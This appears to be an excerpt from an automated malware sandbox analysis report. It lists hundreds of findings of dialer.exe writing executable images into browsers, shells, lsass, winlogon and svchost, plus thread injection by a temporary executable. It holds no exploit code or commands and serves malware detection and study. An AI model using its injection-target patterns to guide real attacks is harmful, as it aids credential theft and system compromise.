Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1FDF37C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 205F6620000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23B8EA40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23BA8D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 14A04DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19E619D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2E66F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2CD170E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2CD17880000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 225129D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F09B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22512E20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F23EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1995E010000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 21939E00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2213C5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231896B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231A3A20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16028450000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C7E7310000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 278821D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23501570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23D04520000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 258C6320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\NNPCZ\mmytljldrgl.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\NNPCZ\mmytljldrgl.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1C090EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1C090EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21E693E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 36E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1B091DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19FE4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22473C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19FE50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29D8BC80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22473F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D7C6010000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C164D20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723BB20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C165070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723DD40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1A866E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A327130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1A8671C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A3292B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CCC8BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DB600000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CCC9390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DBA20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 288B6C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1B2A5A80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F7530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1BAA8230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F90A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2528A950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 28AB3320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 292B5970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF49860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF4BAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16DC7320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29CA7AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F5ABDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 236C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23EC8230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17084C70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17086CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EDCA140000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 29B48F20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 23518C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9290000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9600000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39A50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 171F7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C191250000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19CF9BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19CF9CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1824D380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 141FCAF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E541120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 141FCE50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3DE20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16F55510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E541480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3FE90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BFA97D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C371320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BFA9F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3732F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2370FF10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22851D50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23710260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2286C070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F36EA00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2DE7C5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 19E573B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 2094F9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1A6596B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 20950080000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E1AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E3690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2D04A490000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E29E6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2D04AB10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2534DF00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D2C7140000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1FAD08C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 179A7FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 181AA770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6CC00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6E8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F21B270000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F23FF50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FDE0180000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17A9BA50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A929670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17AA8DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A934D20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B16FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2C2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B171D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7A90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1DEC7E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WerFault.exe base: 11318760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8200000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC82C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1F890960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 238DA2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CDF150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CF0A40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2336B7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2337A1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7210000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7240000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074046001\62aa2588e0.exe base: 1D5EDE00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AE2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AFE20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 26B195A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 207CEFE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 25C3B6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 198D6390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 198D63C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1E72FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1E72FE90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 28966FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 21966AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 24253FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 23207130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1B476430000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1B476460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 29496440000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 29496470000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1D816B00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1D825510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 16658F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1D7230A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1D723340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1C85FF50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 23B58C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2B9F0BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2B9F0C10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2CF42D20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2CF42D80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 28302030000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 28302060000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 17D35390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 17D353F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 22400E80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 22400EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2258B070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2258B0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 187D2DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 187D2DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 289E99F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 289E9A20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1671BC40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1671BC70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 25AFCC80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 25AFCCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 260482C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 260482F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 2698C000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 16994610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 16994640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F371D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37200000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 22B47690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 1E71A8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37C90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37D50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: unknown base: 26F37DB0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 3076 base: C40000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe

Thread register set: target process: 196

Writes to foreign memory regions

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 20E8FA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 26AB5E60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 206DF360000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 194DEAB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 156CB0E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB419A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 223389C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2790E940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26823210000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 20A72460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25E7D550000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20ACF3B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 292067A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CABD5B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 25A301A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1F7B8460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C680BA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24132C70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2268A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D8FCA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19AE6140000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B014100000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20F951A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203807B0000
